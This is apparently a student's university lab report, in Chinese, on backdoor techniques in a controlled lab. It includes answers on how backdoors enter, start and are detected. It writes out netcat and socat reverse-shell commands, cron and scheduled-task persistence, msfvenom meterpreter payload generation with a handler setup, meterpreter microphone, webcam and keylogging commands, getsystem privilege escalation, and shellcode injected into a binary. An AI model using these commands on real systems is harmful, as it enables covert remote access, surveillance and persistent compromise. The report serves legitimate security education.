20222327 2024-2025-1 《网络与系统攻防技术》实验二实验报告

一、实验内容

1.实验目标

(1)使用netcat获取主机操作Shell，cron启动某项任务（任务自定）

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter（或其他软件）生成可执行文件（后门），利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容的后门，并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell。

2.相关问题

(1)例举你能想到的一个后门进入到你系统中的可能方式？

后门进入系统中的一种可能方式是通过下载并安装来路不明的软件或插件。这些软件或插件可能包含后门程序，一旦安装，后门程序就会悄悄地在系统中运行，为攻击者提供未经授权的访问权限。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

针对常见的Windows系统来说存在以下方式
①通过修改系统注册表或启动项，使后门程序在系统启动时自动运行。
②利用系统服务或计划任务来启动后门程序。
③通过网络攻击（如钓鱼邮件、恶意网站等）下载并执行后门程序。

(3)Meterpreter有哪些给你映像深刻的功能？

Meterpreter允许攻击者通过网络与远程受感染的计算机建立连接，并获取对该计算机的完全控制权限；并且提供了一系列方法，可以在受感染系统上实现持久化，以确保攻击者在系统重启后仍然能够访问。
Meterpreter也提供了许多内置模块，用于执行各种操作，包括文件系统访问、网络探测、提权、远程shell访问等。这些功能使得Meterpreter成为攻击者进行网络攻击和渗透测试的重要工具。然而，这些功能同样可以被安全研究人员用于发现和修复系统漏洞，提高系统的安全性。

(4)如何发现自己有系统有没有被安装后门？

①检查系统用户和权限：通过系统的用户管理工具（如Windows的“本地用户和组”或Linux的/etc/passwd文件）检查系统中的用户列表和权限设置。如果发现未知用户或异常权限设置，应立即进行调查和处理。
②检查网络连接状态：使用命令（如Windows的netstat -ano或Linux的netstat -tulnp）查看系统中的网络连接状态。如果发现可疑的IP连接或未知的网络服务正在运行，应进一步调查是否存在后门程序。
③使用安全软件进行检测：安装并运行可靠的安全软件（如杀毒软件、防火墙等），对系统进行全面扫描和检测。这些软件可以识别并清除系统中的恶意软件和后门程序。
④检查系统日志和事件记录：通过查看系统日志和事件记录（如Windows的事件查看器或Linux的/var/log目录），可以发现系统中是否存在异常行为或可疑事件。这些日志和记录可以提供有关后门程序活动的线索。

二、实验过程

任务一 使用netcat获取主机操作Shell，cron启动某项任务（任务自定）

先查看一下本机的ip地址

使用netcat连接本机和虚拟机
在虚拟机中输入命令：nc 192.168.43.14 9000 -e /bin/sh

此时在本机输入命令：nc.exe -l -p 9000后输入ls，若能正常查看文件，证明主机已成功获取shell

输入后进入文字编辑器，新增命令30 * * * * /bin/netcat 192.168.43.14 9000 -e /bin/sh****
编辑好之后进行查看

这条命令是在每小时的第30分钟启动任务
这时可以在/var/spool/cron/crontabs中找到root文件

然后在主机的中操作，输入:echo "* * * * * echo "20222327" > /home/changyu/20222327.txt" > /var/spool/cron/crontabs/root
每分钟执行一次用“20222327”覆盖文件20222405.txt，再输入crontab -l检查时程表

由上图可知文件修改成功，自此任务一完成

任务二 使用socat获取主机操作Shell, 任务计划启动

在主机中输入socat.exe tcp-listen:9000 exec:cmd.exe,pty,stderr

在kali中输入命令：socat - tcp:192.168.43.14:9000

编写一个后门程序

在kali中输入schtasks /create /sc minute /mo 1 /tn "20222327cy" /tr C:\Users\ACER\Desktop\20222327cy.exe
回到Windows主机，打开计算机管理，可以看到正在运行的任务“20222327cy”，说明实验成功。

任务三 使用MSF meterpreter（或其他软件）生成可执行文件（后门），利用ncat或socat传送到主机并运行获取主机Shell

首先先关闭防火墙

首先查看虚拟机的ip地址

虚拟机地址为192.168.43.200 ；输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.200 LPORT=9000 -f exe > 20222405backdoor.exe

主机输入命令：ncat.exe -lv 9000 > "C:\Users\ACER\Desktop\2327backdoor.exe"

虚拟机上输入指令：nc 192.168.43.14 9000 < 2327backdoor.exe

在本机上找到文件

在Kali中输入命令msfconsole，然后依次输入如下代码配置监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.200
set LPORT 9000

接着输入exploit运行监听模块，并在主机运行2327backdoor.exe文件，之后输入ls查看桌面文件

任务三完成

任务四 使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容的后门，并尝试提权

1.获取目标主机音频、截屏、摄像头、键盘记录

record_mic　（录音）

screenshot（截屏）

webcam_snap （调用摄像头）

keyscan_start 开始记录键盘输入 keyscan_dump 停止记录

在exploit中继续输入getuid 查看当前用户和getsystem 提权

任务五 使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell。

输入命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.200 LPORT=9000 -x /home/changyu/Desktop/pwn20222327_2 -f elf>2327_pwn、

接下来对2327_pwn进行授权

接下来继续配置监听模块重现监听过程


最后在虚拟机中的另一powershell中运行2327_pwn文件，回到进行监听的shell中输入ls

由图可知，反注入成功

三、问题及解决方案

• 问题1：在进行任务五中反注入文件无法运行
• 问题1解决方案：在创建反注入payload时。代码应该为msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.200 LPORT=9000 -x /home/changyu/Desktop/pwn20222327_2 -f elf>2327_pwn
  但是在第一次创建时由于没有弄清是通过什么注入到什么系统中进行监听所以将代码中的linux输成了Windows
• 问题2：ip地址问题
• 问题2解决方案：本次实验需要本机和虚拟机的IP地址，而且在生成文件时也需要输入对应的IP地址，这就需要我弄清楚每一条指令是谁来监听谁，才能得出我需要的实验结果 - ...

四、学习感悟、思考等

在本次实验中我第一次生成了一个后门程序，通过指令等方式通过在虚拟机上对本机进行相应操作，同时也能够对本机的一些指令监听。从攻击来学习防范，不仅能够让我对后门的手段有了一些认识，也明白了一些防范自己的设备被后门攻击的防范意识。